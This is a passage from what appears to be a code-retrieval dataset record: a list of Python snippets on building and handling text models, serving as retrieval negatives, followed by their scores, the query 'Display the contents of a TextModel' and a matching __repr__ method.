>'\n tokens = self.split(text)\n self.corpus_len = len(tokens)\n self.n_grams_by_len = [{} for _ in range(self.n)]\n for i in range(len(tokens)): # for index in tokens\n for n in range(self.n): # for n-gram size from 1 to n:\n if i >= n: # if the index has advanced enough for this n\n n_gram = self.join(tokens[i - n: i + 1])\n n_grams = self.n_grams_by_len[n] # get dict for respective n\n n_grams[n_gram] = n_grams.get(n_gram, 0) + 1 # get dict for respective n\n return self.get_model()", "def __init__(self, tokenizer, model, text=None, **kwargs):\n self.tokenizer = tokenizer\n self.model = model\n self.model.eval() # deactivate DropOut modules to have reproducible results during evaluation\n self.model.to(self.device)\n self.input_text = text\n self._clear_results()\n self.alpha = kwargs.get('alpha', 1)", "def test_default_text(self) -> None:\n item = Item()\n self.assertEqual(item.text, \"\")", "def empty(model, inplace=False):\n\n return Environment.from_defaults(model, max_uptake=0, max_secretion=None, inplace=inplace)", "def __init__(self):\n self.text = ''", "def create_model(self) -> None:\n self._model = create_model_with_temperature_scaling(self.config)", "def __init__(self, *args):\n this = _libsbml.new_ModelCreator(*args)\n try: self.this.append(this)\n except: self.this = this", "def _get_and_build_text_structure(self):\n return Text_structure(self.filename, self)", "def create_model(self, **inputs):\n raise NotImplementedError('This method has to be overwritten.')", "def basic_model_init(model_args, task_infos, tokenizer):\n config = AutoConfig.from_pretrained(\n model_args.model_name_or_path,\n num_labels=task_infos.num_labels,\n cache_dir=model_args.model_cache_dir,\n id2label=task_infos.id2label,\n label2id=task_infos.label2id,\n )\n model_cls = getattr(mod, model_args.architectures,\n AutoModelForSequenceClassification)\n model = model_cls.from_pretrained(\n model_args.model_name_or_path,\n config=config,\n cache_dir=model_args.model_cache_dir,\n )\n if model.config.vocab_size < len(tokenizer):\n print(\"resize...\")\n model.resize_token_embeddings(len(tokenizer))\n return model", "def __init__(self, model_name):\r\n self.name = model_name\r\n self.words = ({})\r\n self.word_lengths = ({})\r\n self.stems = ({})\r\n self.sentence_lengths = ({})\r\n self.punctuation = ({})", "def __init__(self, text):\n\n self.text = text", "def fasttext_model(\n sentences, size=100, min_count=5, negative=5, window=5,\n cbow=True, iterations=5, seed=0, workers=1):\n cbow = 0 if cbow == 1 else 1\n model = FastText(\n sentences, size=size, min_count=min_count,\n negative=negative, window=window, sg=cbow, iter=iterations,\n seed=seed, workers=workers)\n\n return model", "def __init__(self, *args):\n this = _libsbml.new_Model(*args)\n try: self.this.append(this)\n except: self.this = this", "def test_create_text_index_noschema(self):\n actual = self.engine._create_text_index()\n expected = 'TextIndex'\n self.assertEqual(actual, expected)", "def __init__(self, model):\n super().__init__()\n\n # declare model\n self._model = model\n\n self._textBox = QTextEdit(self)\n\n self._executeButton = QPushButton(\"Execute!\", self)\n # self._userBox = QLineEdit(self)\n # self._frameTextLabel = QLabel(\"Frame Number: %s\" % (None), self)", "def test_create_without_translation(self):\n x = NotRequiredModel()\n\n self.assertNumQueries(1, lambda: x.save()) # only master object created\n self.assertEqual(sorted(x.get_available_languages()), [])", "def initialize_model(self):\n pass", "def __init__(self, text):\n self.text = text", "def __init__(self, text):\n self.text = text", "def text_to_instance(self, text_label: list):\n label = LabelField(\n self.label_to_idx[text_label[0]], skip_indexing=True\n )\n tokens = [Token(token) for token in text_label[1].split()]\n sentence_field = TextField(tokens, self.token_indexers)\n\n fields = {\"sentence\": sentence_field, \"labels\": label}\n return Instance(fields)", "def fasttext_model(sentences, size=100, min_count=5, window=5, negative=5,\r\n cbow=True, iterations=5, seed=0, workers=1):\r\n return FastText(sentences, size=size, min_count=min_count, window=window,\r\n negative=negative, sg=not cbow, iter=iterations,\r\n seed=seed, workers=workers)", "def test_create_model(self):\n model = ControlledSchema.create_model(self.engine, self.repos, declarative=False)\n self.assertTrue(isinstance(model, six.string_types))\n\n model = ControlledSchema.create_model(self.engine, self.repos.path, declarative=True)\n self.assertTrue(isinstance(model, six.string_types))", "def train_and_generate(text_path):\n\n print(\"\\n------------------ ff.io Parameters ------------------\")\n print(f\"Generate text length: {text_length}\")\n print(f\"Sequence length: {seq_length}\\n\")\n print(f\"{layers_count} layers with dimension {layers_dim}\")\n print(f\"{epoch_num} epochs with batch size {batch_s}\\n\")\n\n text = read_text(text_path)\n\n if load_model:\n print(\"Loading model from file.\")\n\n if model_type == 'word':\n print(\"Creating word maps.\")\n characters, n_to_char, char_to_n = word_map(text)\n \n else: # Default to character maps\n print(\"Creating character maps.\")\n characters, n_to_char, char_to_n = character_map(text)\n\n if seed_text:\n seed_text_str = read_text(seed_text_filepath)\n\n print(\"Processing text.\")\n X, Y, characters, n_to_char = process_text(text, characters, n_to_char, char_to_n)\n\n print(\"Modelling\\n\")\n mod = model(X, Y, characters)\n\n gen_text = generate_text(mod, text_length, text, X, characters, n_to_char, char_to_n, seed_text_str = seed_text_str)\n\n return gen_text", "def _create_string_input_trainable_model():\n\n class BlockWithStringInputs(onnxblock.ForwardBlock):\n def __init__(self):\n super().__init__()\n self.cast = onnxblock.blocks.Cast(to=onnx.TensorProto.FLOAT)\n self.linear = onnxblock.blocks.Linear(4, 2)\n\n def build(self, string_input):\n return self.linear(self.cast(string_input))\n\n string_block = BlockWithStringInputs()\n with onnxblock.empty_base() as model_accessor:\n model_accessor.model.graph.input.extend(\n [\n onnx.helper.make_tensor_value_info(\"input\", onnx.TensorProto.STRING, [1, 4]),\n ]\n )\n _ = string_block(\"input\")\n\n return string_block.to_model_proto()", "def test_empty_model(self):\n\n class Foo(Model):\n pass\n\n assert hasattr(Foo, \"_fields\")\n assert type(Foo._fields) is dict\n assert len(Foo._fields.items()) == 0", "def __init__(self, text, no_ne_label = 'O'):\n # Adding re.UNICODE with \\s gets rid of some stupid special unicode whitespaces\n # That's neccessary, because otherwise the stanford POS tagger will split words at\n # these whitespaces and then the POS sequences have different lengths from the\n # token sequences\n text = re.sub(r\"[\\t\\s]+\", \" \", text, flags=re.UNICODE)\n tokens_str = [token_str.strip() for token_str in text.strip().split(\" \")]\n self.tokens = [Token(token_str) for token_str in tokens_str if len(token_str) > 0]\n self.no_ne_label = no_ne_label", "def test_constructor_None(self):\n structure = MultiLingualTextStructure(None, use_default_for_empty=True)\n self.assertEqual(structure[\"nb\"], \"\")\n self.assertEqual(structure[\"en\"], \"\")", "def create_tweet(model):\n return model.make_short_sentence(140, init_state=None)", "def __init__(self,\n text: str) -> None:\n\n super().__init__(text)", "def init_model(self):\n pass", "def process_text(model_name: str, text: str) -> spacy.tokens.Doc:\r\n nlp = load_model(model_name)\r\n return nlp(text)", "def create(self) -> tf.keras.models.Model:\n raise NotImplementedError()", "def __init__(self, model_name):\n\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.stems={}\n self.sentence_lengths={}\n self.endings={}\n self.total = 0", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def _create_model(self, key):\n pass", "def make_model():\n m = model_class(*argv[2:-1])\n modelobj[\"model\"] = m", "def __init__(self, model_name):\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.stems = {}\n self.sentence_lengths = {}\n self.punctuation = {}", "def create_train_model(self):\n st = LancasterStemmer()\n with open(self.data_path, encoding='utf8') as f_name:\n sentences = [[st.stem(w) for w, t in pos_tag(line.lower().split()) if 'N' in t] for line in f_name]\n sentences = [filter(lambda x: len(x) > 2, (word.strip(punctuation) for word in sentences)) for sent in sentences]\n model = Word2Vec(sentences,\n min_count=self.min_count,\n size=self.size,\n window=self.window,\n workers=4)\n model.save(self.model_path)", "def test_phrase_create(self):\n tokens = ['this', 'is', 'a', 'test', 'phrase']\n entities = [\n Entity('this', 'who', I('this'), 0, 1),\n Entity('phrase', 'what', I('phrase'), 4, 5)]\n relations = [Relation(entities, confidence=1.0)]\n phrase = Phrase(tokens, relations, 1, 1)\n expected = '<Blank> (who) is a test (what) <Blank>'\n self.assertEqual(phrase.to_string(), expected)", "def compute_model_for_text(text, model_type=MODEL_3_GRAMS, clean_method=norm.CLEAN_TWEET):\n\n # validating model type\n if model_type not in model_generator_mapper:\n raise Exception('Unknown model type received.')\n\n # validating cleaning method\n if clean_method not in norm.clean_text_method_mapper:\n raise Exception('Unknown text cleaning method received.')\n\n # building the model for the data set just created\n model_features = compute_model_from_data_set([text], model_type, clean_method)\n\n # returning the model features\n return model_features", "def __init__(self, model_name):\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.sentence_lengths = {}\n self.stems = {}\n self.commas_per_sentence = {}", "def test_create_with_default_attributes(self):\n\n x = NotRequiredModel()\n x.tr_title = \"DEFAULT_TRANS_TITLE\"\n\n self.assertNumQueries(2, lambda: x.save()) # master and translation object created\n self.assertEqual(sorted(x.get_available_languages()), [self.conf_fallback])", "def new(self):\n\n self.obj = self.factory()\n\n if self.textproperty is None:\n self.attributes = ElementHandler.load_definitions(self, self.obj)", "def load_fasttext_format(cls, model_file, encoding='utf8'):\n model = cls()\n if not model_file.endswith('.bin'):\n model_file += '.bin'\n model.file_name = model_file\n model.load_binary_data(encoding=encoding)\n return model", "def model() -> Model:\n return Model()", "def __init__(self, text: Union[str, Text, None] = None):\n if isinstance(text, str):\n text = TNTParser().parse(text)\n if text is not None:\n self.text = text", "def build_model(self , text, n=3): #should be called build_model\n self.n = n\n self.vocab = Counter(words(text))\n\n tokens=tokenize(text)\n for gram in list(ngrams(tokens,self.n)):\n self.lm_dict[tuple(gram[:-1])][gram[-1]]+=1", "def generate_from_text(self, text):\n words = self.process_text(text)\n self.generate_from_frequencies(words)\n return self", "def createModel(self, X_train, y_train):\n total_words = len(self.tokenizer.word_index) + 1\n # Create model and layers\n model = Sequential()\n model.add(Embedding(total_words, 100, input_length=self.max_sequence_len-1))\n model.add(Bidirectional(LSTM(150)))\n model.add(Dense(total_words, activation=\"softmax\"))\n # Compile model\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=0.01), metrics=['accuracy'])\n # Fit model to training data\n fitting = model.fit(X_train, y_train, epochs=100, verbose=1, callbacks=[self.callback])\n return model", "def __init__(self):\n self.model = None", "def __init__(self):\n self.model = None", "def __init__(self, type_=None, text=None, ssml=None):\n default_attr = dict(type=str(),\n text=str(),\n ssml=str())\n self.type = type_\n self.text = text\n self.ssml = ssml\n self._set_default_attr(default_attr)", "def test_text_classifier_create(self):\n pass", "def create_models( self ):", "def EmptyStringField(**kwargs: Any) -> Any:\n return Field(\"\", **kwargs)", "def test_text_default(self):\n r = Review()\n self.assertEqual(\"\", r.text)", "def _create_model(self):\n\n model_formula = self.get_model_formula()\n\n removed_observation_index = self._model_dataset.index.isin(self._excluded_observations)\n\n # TODO: Handle error that occurs when all model observations are invalid\n model = smf.ols(model_formula,\n data=self._model_dataset,\n subset=~removed_observation_index,\n missing='drop')\n\n self._model = model", "def fit(self, text):\n\n with open('forward_ngram_model.pkl', 'rb') as fin:\n self.forward_model = pickle.load(fin)\n\n with open('backward_ngram_model.pkl', 'rb') as fin:\n self.backward_model= pickle.load(fin)", "def __init__(self, model: Optional[Model] = None) -> None:\n self.model = model", "def build_model(self):\n doc_input = Input(shape=(self.max_sent_num ,self.max_sent_length,512), dtype='float32')\n doc_in=Flatten()(doc_input)\n \n #masked3=Masking(mask_value=Special_value)(doc_input)\n \n # self.model_sent = self.build_sent_encoder()\n \n # doc_encoder= TimeDistributed(self.model_sent)(doc_in)\n \n # document_att= self.build_doc_encoder(doc_encoder)\n dense= Dense(DENSE_SIZE,activation='softmax')(doc_in)\n #doc_att = self.build_sent_encoder(sent_encoder)\n # dense the output to 2 because the result is a binary classification.\n output_tensor = Dense(3, activation='softmax', name='classification')(dense)\n # Create Sentence-level Model\n self.model = Model(doc_input, output_tensor)", "def create_new_model(\n self, content: Optional[Dict[str, Any]], model_name: str, columns_sql: Sequence[str]\n ) -> Dict[str, Any]:\n logger.info(f\"The model '{model_name}' has not been documented yet. Creating a new entry.\")\n columns = []\n for column_sql in columns_sql:\n description = self.get_column_description_from_dbt_definitions(column_sql)\n columns.append({\"name\": column_sql, \"description\": description})\n model = {\n \"name\": model_name,\n \"description\": MODEL_NOT_DOCUMENTED,\n \"columns\": columns,\n }\n if not content:\n content = {\"version\": 2, \"models\": [model]}\n else:\n content[\"models\"].append(model)\n return content", "def CreateModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def create_model_uniform(text: str) -> List[str]:\n return str.split(text)", "def __call__(self, string):\n return Text(string, self)", "def __init__(self, name:str, model_path:str, \n disabled:List[str]=[\"parser\", \"tagger\", \"lemmatizer\", \"attribute_ruler\"]):\n \n super(ModelAnnotator, self).__init__(name)\n self.model = spacy.load(model_path, disable=disabled)", "def create_task(text):\n new_task = Tasks(task_text=text) \n new_task.save()", "def text_plot(self):\n if self.stext is not None:\n # Create text object :\n self.stextmesh = visu.Text(text=self.stext, color=self.stextcolor,\n font_size=self.stextsize, pos=self.xyz,\n bold=True, name='SourcesText')\n\n # Set text texture :\n self.stextmesh.set_gl_state('translucent', depth_test=True)\n\n # Apply a transformation to text elements to not cover sources :\n self.stextmesh.transform = vist.STTransform(\n translate=self.stextshift)\n else:\n self.stextmesh = visu.Text(name='NoneText')", "def create(self, text):\r\n self.require_collection()\r\n request = http.Request('POST', self.get_url(), self.wrap_object(text))\r\n\r\n return request, parsers.parse_json", "def insert():\n new_text = request.json\n text = TextModel(new_text)\n text.validate()\n unique_fields = [{\"key\"}]\n repository.insert_one_unique_fields(COLLECTION_NAME, text.to_dict(), unique_fields)\n return {\"message\": \"success!\"}, 201", "def create_model(self, data):\n model = nodeitemmodel.NodeItemModel(self.parent.nodedatamanager)\n root = model.invisibleRootItem()\n for attr, value in data.iteritems():\n # components will be initialized separately later\n if attr == 'components':\n self.init_row(model, attr, None, root)\n else:\n self.init_row(model, attr, value, root)\n # end for attr, value in data.iteritems()\n return model", "def create_new_text(self, *args, **kw):\n shape_id = self._create('text', args, kw)\n self.variables.shape_ids.append(shape_id)\n canvas_coords = args[0]\n self.variables.vector_objects[str(shape_id)] = VectorObject(SHAPE_TYPES.TEXT, None)\n self.variables.shape_ids.append(shape_id)\n self.set_shape_pixel_coords_from_canvas_coords(shape_id, canvas_coords)\n self.variables.current_shape_id = shape_id\n return shape_id", "def model(self):\n self.add_file_string('Model file')\n self.make_dangerous('Model file')", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def text_to_instance(self, tokens: List[Token], tags: List[SequenceLabelField] = None) -> Instance:\n\n sentence_field = TextField(tokens, self.token_indexers)\n fields = {'sentence' : sentence_field}\n\n if tags:\n tag_field = SequenceLabelField(labels=tags, sequence_field=sentence_field)\n fields['labels'] = tag_field\n\n return Instance(fields)", "def create_model(self, todolist):\n\t\tstore = gtk.ListStore(int, str)\n\n\t\tfor todo in todolist:\n\t\t\tnew_row = (todo.id, todo.text)\n\t\t\tprint new_row\n\t\t\tstore.append(new_row)\n\n\t\treturn store", "def test_create_nontar_model():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, \"misc\")\n model_file = os.path.join(misc_folder, \"model-nonexistent.bla\")\n create.main(\"mlp\", \"10:12:8\", model_file)\n # TODO: Check if error was logged", "def createModel(self):\n model_psp = self.getModelPsp()\n\n if not model_psp:\n log_func.warning(u'Not define model in <%s : %s>' % (self.getName(), self.getType()))\n return None\n\n model_name = self.newPassport().setAsStr(model_psp).name\n\n scheme = self.getScheme()\n if scheme:\n return scheme.getModel(model_name)\n else:\n log_func.warning(u'Error create data scheme object')\n return None", "def create(\n cls,\n config: Dict[Text, Any],\n model_storage: ModelStorage,\n resource: Resource,\n execution_context: ExecutionContext,\n ) -> WhitespaceTokenizer:\n # Path to the dictionaries on the local filesystem.\n return cls(config)", "def mytext(x,y,s,**kwargs):\n # we take care of this one\n model = kwargs.pop('model', None)\n if model:\n th = text(x,y,model,**kwargs)\n draw()\n x0,y0,w,h = th.get_window_extent().bounds\n gca().texts.remove(th)\n x = x0\n y = y0\n kwargs['transform'] = matplotlib.transforms.IdentityTransform()\n kwargs['horizontalalignment'] = 'left'\n kwargs['verticalalignment'] = 'baseline'\n# print x,y,kwargs\n return text(x,y,s,**kwargs)", "def newTestTxt(self):\n self.newTab( extension = TestTxt.TYPE, repoDest=UCI.REPO_UNDEFINED )", "def create_model(session, forward_only):\n print(FLAGS.en_vocab_size, FLAGS.fr_vocab_size)\n model = seq2seq_model.Seq2SeqModel(\n FLAGS.en_vocab_size, FLAGS.fr_vocab_size, _buckets,\n FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm, FLAGS.batch_size,\n FLAGS.learning_rate, FLAGS.learning_rate_decay_factor, use_lstm=True,\n forward_only=forward_only)\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n if ckpt and tf.gfile.Exists(ckpt.model_checkpoint_path):\n print(\"{} : Reading model parameters from {}\".format(\n datetime.now().ctime(), ckpt.model_checkpoint_path))\n model.saver.restore(session, ckpt.model_checkpoint_path)\n else:\n print(\"{} : Created model with fresh parameters.\".format(\n datetime.now().ctime()))\n session.run(tf.initialize_all_variables())\n return model", "def initialize_model(self):\n model = self.model_class()\n return model", "def get_or_create(cls, text):\n h = sha256(text).hexdigest()[:32]\n planet = TextPlanet.query.get(h)\n\n if planet is None:\n app.logger.info(\"Storing new text\")\n planet = TextPlanet(\n id=h,\n text=text)\n\n return planet", "def test_invalid_text_input(self):\n m = Message(\n text=None, user_id=self.uid\n )\n db.session.add(m)\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()", "def main():\n if args.file and not args.nomodel:\n text = read_file(args.file)\n trained_model = train_char_model(text, args.prev)\n save_model(trained_model, args.file)\n sys.exit()\n if args.model:\n trained_model = load_model(args.model)\n if args.nomodel and args.file:\n trained_model = train_char_model(read_file(args.file), args.prev)\n # generate some random text\n history = check_history(trained_model, args.prev)\n gentext = generate_text(trained_model, history, args.gen)\n print(gentext)", "def __init__(self, file_path):\n\n\t\tsuper(Text, self).__init__()\n\n\t\tself.open_file_path(file_path)\n\t\tself.preprocess_raw_text()\n\t\tself.concatenate_processed_text()\n\t\tself.generate_list_of_words()\n\n\t\tself.name = split(file_path)[-1]", "def init_model(session, model):\n # If there is a checkpoint, load it\n if not tf.gfile.Exists(FLAGS.train_dir):\n tf.gfile.MkDir(FLAGS.train_dir)\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):\n print(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n\n # Else initialize the variables\n else:\n if FLAGS.decode:\n input(\"You sure you want to talk to an untrained chatbot? Press Ctrl-C to stop, Return to continue \")\n print(\"Fine.\")\n\n print(\"Creating model with fresh parameters.\")\n session.run(tf.global_variables_initializer())", "def test_empty_model(self):\n x = EmptyModel()\n x.set_current_language(\"en\", initialize=True)\n x.set_current_language(\"fr\", initialize=True)\n x.set_current_language(\"es\")\n x.set_current_language(\"nl\", initialize=True)\n x.save()\n\n self.assertEqual(sorted(x.get_available_languages()), [\"en\", \"fr\", \"nl\"])", "def initialize(self, model):\n pass" ]
[ "0.6320198", "0.6107785", "0.59958667", "0.59958667", "0.59898424", "0.5779712", "0.5769155", "0.569185", "0.56886506", "0.5644959", "0.5625166", "0.55378115", "0.55203444", "0.5467053", "0.54275054", "0.5417462", "0.5403038", "0.5393681", "0.5377207", "0.5369345", "0.5360774", "0.53478116", "0.53204674", "0.5310034", "0.53045213", "0.53009707", "0.52982545", "0.5293802", "0.52734685", "0.5258427", "0.5258427", "0.52521527", "0.52484924", "0.52391577", "0.52381766", "0.52239704", "0.5210568", "0.5210242", "0.52047676", "0.52022636", "0.52011967", "0.51801765", "0.5176298", "0.51755404", "0.51748306", "0.5171819", "0.51682603", "0.5163592", "0.51573503", "0.5153422", "0.51503015", "0.51281226", "0.5127772", "0.5123486", "0.5113629", "0.5106172", "0.5101882", "0.50943476", "0.5091639", "0.5085245", "0.5079829", "0.5077645", "0.5077645", "0.50728315", "0.5065944", "0.50428015", "0.5017555", "0.50163674", "0.5007837", "0.50009334", "0.49973464", "0.49935126", "0.49905574", "0.49873638", "0.49845296", "0.49837598", "0.49830893", "0.49768186", "0.49644637", "0.49525657", "0.49521196", "0.49517003", "0.49376348", "0.49374896", "0.49225143", "0.49144992", "0.49080205", "0.49067575", "0.49052018", "0.4891445", "0.48855555", "0.48814932", "0.48789403", "0.4877627", "0.48679635", "0.48676088", "0.4860968", "0.48591352", "0.4857204", "0.4846262", "0.48382613" ]
0.0
-1
Display the contents of a TextModel.
def __repr__(self): s = 'Words:\n' + str(self.words) + '\n\n' s += 'Word lengths:\n' + str(self.wordlengths) + '\n\n' s += 'Stems:\n' + str(self.stems) + '\n\n' s += 'Sentence lengths:\n' + str(self.sentencelengths) + '\n\n' s += 'Gerunds:\n' + str(self.gerund) return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show(self):\n self.set_text(self.read())", "def send_text(self):\n def f():\n self.highlight_input()\n text = self.text_transfer.get()[self.counter]\n self.model = text\n # print(\"yep\")\n self.parent.update_model(self.model.upper())\n print(self.model)\n return f", "def display(self):\n art = \"\\n\".join([\"\".join(row) for row in self.text])\n if self.args.output:\n with open(self.args.output, \"w\") as f:\n f.write(art)\n\n if self.args.verbose:\n print(art)", "def getText():", "def getText():", "def getText():", "def getText():", "def getText():", "def render_text(self):\n if self.text_type == 1:\n return markdown.markdown(self.text)\n else:\n return self.text", "def show_text(text, args):\n return expyriment.stimuli.TextLine(text,\n text_font=args[\"--text-font\"],\n text_size=args[\"--text-size\"],\n text_colour=args[\"stimuli_color\"],\n background_colour=args[\"bg_color\"])", "def text(self) -> None:\n label_space = tk.Label(self)\n label_space.grid(row=0)\n label_book_number = tk.Label(self, text=f'Номер книги:')\n label_book_number.grid(row=1, column=0, ipady=5)\n label_title = tk.Label(self, text='Название книги:')\n label_title.grid(row=2, column=0, padx=5)\n label_author = tk.Label(self, text='Автор:')\n label_author.grid(row=3, column=0, pady=5)\n label_genre = tk.Label(self, text='Жанр:')\n label_genre.grid(row=4, column=0)", "def displayInfo(self, model):\n\t\ttaglist = []\n\t\tfor tag in model.tags:\n\t\t\ttaglist.append(tag.tagname)\n\t\tself.infoText.SetPage(infoTemplate.render(model=model, tags= ','.join(taglist)))", "def text_plot(self):\n if self.stext is not None:\n # Create text object :\n self.stextmesh = visu.Text(text=self.stext, color=self.stextcolor,\n font_size=self.stextsize, pos=self.xyz,\n bold=True, name='SourcesText')\n\n # Set text texture :\n self.stextmesh.set_gl_state('translucent', depth_test=True)\n\n # Apply a transformation to text elements to not cover sources :\n self.stextmesh.transform = vist.STTransform(\n translate=self.stextshift)\n else:\n self.stextmesh = visu.Text(name='NoneText')", "def contents(self, text):\n self.app.contents = text", "def getText(self):", "def use_model(model):\n st.set_page_config(page_title=\"MDNER\", layout=\"wide\")\n streamlit_style = \"\"\"\n\t\t<style>\n\t\t\thtml, body {\n\t\t\t font-family: 'Roboto', sans-serif;\n\t\t\t}\n\t\t</style>\n\t\"\"\"\n st.markdown(streamlit_style, unsafe_allow_html=True)\n st.markdown(\n \"<h1 style='text-align: center; color: dodgerBlue;'>📑 MDNER 🧬</h1>\",\n unsafe_allow_html=True,\n )\n text = st.text_area(\"Text to annotate\", height=300)\n run_button, export_button, _ = st.columns([1, 2, 10])\n with run_button:\n apply = st.button(\"Run\")\n if apply:\n # Load the best model\n nlp = spacy.load(f\"results/models/{model}/model-best\")\n # Define the colors for the entities\n colors = {\n \"TEMP\": \"#FF0000\",\n \"SOFT\": \"#FFA500\",\n \"STIME\": \"#FD6C9E\",\n \"FFM\": \"#00FFFF\",\n \"MOL\": \"#FFFF00\",\n }\n options = {\n \"ents\": [\n \"TEMP\",\n \"SOFT\",\n \"STIME\",\n \"FFM\",\n \"MOL\",\n ],\n \"colors\": colors,\n }\n # Apply the model to the text\n doc = nlp(text)\n # Visualize the entities in html\n html = displacy.render(doc, style=\"ent\", options=options)\n st.divider()\n st.write(html, unsafe_allow_html=True)\n st.divider()\n save_to_json(doc, text, export_button)", "def display_text(self, text):\n self.write_to_serial(':DISP:TEXT \\'' + text + '\\'')", "def astext(self):\n self.elements.update({\n 'body': u''.join(self.body),\n 'indices': self.generate_indices()\n })\n return self.render('beamer.tex_t', self.elements)", "def textdisplay(textTitle, analysis):\n try:\n global current_file\n with Database() as database:\n text_owner = database.getTextOwner(textTitle, session['username'])\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER + text_owner\n path = app.config['UPLOAD_FOLDER'] + '/objects/' + textTitle + '.txt'\n with open(path, 'rb') as f:\n current_file = pickle.load(f)\n analysed_texts = current_file.analysed_texts\n text_facts = current_file.stats\n keywords = ''\n for word in text_facts['Key Words']:\n keywords += word[0] + \", \"\n keywords = keywords[:-2]\n return render_template('textdisplay.html',\n title=current_file.title,\n texts=analysed_texts,\n text=analysed_texts[analysis],\n facts=text_facts,\n keywords=keywords,\n owner=text_owner,\n user=session['username'])\n except Exception as e:\n flash(\"Something went wrong, please try again\")\n return redirect(url_for('profile', username=session['username']))", "def text(self) -> str:", "def __repr__(self):\r\n printer = 'text model name: ' + str(self.name) + '\\n'\r\n printer += ' number of words: ' + str(len(self.words)) +'\\n'\r\n printer += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\r\n printer += ' number of stems: ' + str(len(self.stems)) + '\\n'\r\n printer += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\\n'\r\n printer += ' number of different punctuations: ' + str(len(self.punctuation)) \r\n return printer", "def displayText(self):\n if self.entryWidget.get().strip() == \"\":\n tkMessageBox.showerror(\"Tkinter Entry Widget\", \"Enter a text value\")\n else:\n self.file_com.write(self.entryWidget.get().strip()+'\\n')", "def read_all_screen(self):\n full_text = \"\"\n for ypos in range(self.model_dimensions[\"rows\"]):\n full_text += self.string_get(ypos + 1, 1, self.model_dimensions[\"columns\"])\n return full_text", "def showAsString(self, data):\n if isinstance(data, h5py.Dataset):\n data = data.value\n self.__text.setText(str(data))\n self.setCurrentIndex(self.__indexText)", "def result(target_text):\n\n display_text(target_text)\n readability(target_text)", "def get_text(self):", "def record_text(self, **kw):\n return self._text(self._record_template, **kw)", "def show_topic_model_textually(seed_gensim_topic_model, seed_gensim_corpus,\n texts_to_analyze, num_topics):\n print(\"alpha =\", seed_gensim_topic_model.alpha)\n print(seed_gensim_topic_model)\n print(seed_gensim_topic_model.print_topics(num_topics))\n print()", "def __str__(self):\n\t\treturn self.text", "async def text(self, ctx):\n pass", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def save_text(self):\n content = self.get_content()\n if content != '':\n self.text.append((content, self.context, self.ancestor))", "def set_text(self):\n pass", "def showText(self, context, text, size=1, color=colors.WHITE, conversion=True):\n context.print(text, self.components, size, color=color, conversion=conversion)", "def process_text(model_name: str, text: str) -> spacy.tokens.Doc:\r\n nlp = load_model(model_name)\r\n return nlp(text)", "def edit_text(self):\n self.text = self.ui.plainTextEdit.toPlainText()\n sentences_number = count_sentences(self.text)\n self.ui.label.setText(\n f\"{count_sentences(self.text)} sentences in source text\")\n self.ui.spinBox.setMaximum(sentences_number)", "def updatetext(self, func, args):\n linelist = func(*args)\n self.headertext.set(linelist[0].capitalize())\n if len(linelist) > 1:\n self.viewlist = linelist[1:]\n self.viewing = 0\n self.intext.set(self.viewlist[self.viewing])\n self.afterid = self.master.after(5000, self.cycle)", "def draw(self, screen):\n lines = self.text.strip().split('\\n')\n y = self.y\n for line in lines:\n self.ui.show_text(line, (self.x, y), 30)\n y += 32", "def display_text(target_text):\n\n print('Text to analyze:')\n print('')\n print('-------TEXT BELOW-------')\n print(target_text)\n print('-------TEXT ENDS-------')\n print('')", "def __repr__(self):\n return self.text", "def __repr__(self):\n return self.text", "def __repr__(self):\n s = 'text model name: ' + self.name + '\\n'\n s += ' number of words: ' + str(len(self.words)) + '\\n'\n s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\n s += ' number of stems: ' + str(len(self.stems)) + '\\n'\n s += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\\n'\n s += ' most common words: ' + str(self.common_word) + '\\n'\n\n return s", "def format_text(text: TTextType) -> typing.Iterator[TViewLine]:\n for line in text.splitlines():\n yield [(\"text\", line)]", "def mytext(x,y,s,**kwargs):\n # we take care of this one\n model = kwargs.pop('model', None)\n if model:\n th = text(x,y,model,**kwargs)\n draw()\n x0,y0,w,h = th.get_window_extent().bounds\n gca().texts.remove(th)\n x = x0\n y = y0\n kwargs['transform'] = matplotlib.transforms.IdentityTransform()\n kwargs['horizontalalignment'] = 'left'\n kwargs['verticalalignment'] = 'baseline'\n# print x,y,kwargs\n return text(x,y,s,**kwargs)", "def on_open_text(self, event):\r\n self.text_id = event.EventObject.text_id\r\n data = self.data[self.text_id]\r\n self.edit_text.Value = data[\"text\"]\r\n self.list_lang.Value = data[\"lang_text\"]\r\n if data[\"filenames\"]:\r\n self.mediactrl.Load(data[\"filenames\"][0])\r\n if self.mc_hack:\r\n wx.CallLater(500, self.mediactrl.Play)", "def get_text(self) -> str:\n return self.text", "def __init__(self, model):\n super().__init__()\n\n # declare model\n self._model = model\n\n self._textBox = QTextEdit(self)\n\n self._executeButton = QPushButton(\"Execute!\", self)\n # self._userBox = QLineEdit(self)\n # self._frameTextLabel = QLabel(\"Frame Number: %s\" % (None), self)", "def render_text(self, text, *args, **kwargs):\n global TEXT_TEMPLATE\n self.render(TEXT_TEMPLATE, text=text, *args, **kwargs)", "def index(request):\n form = textForm()\n return render(request, 'index.html', {'form': form})", "def __repr__(self):\n \n s 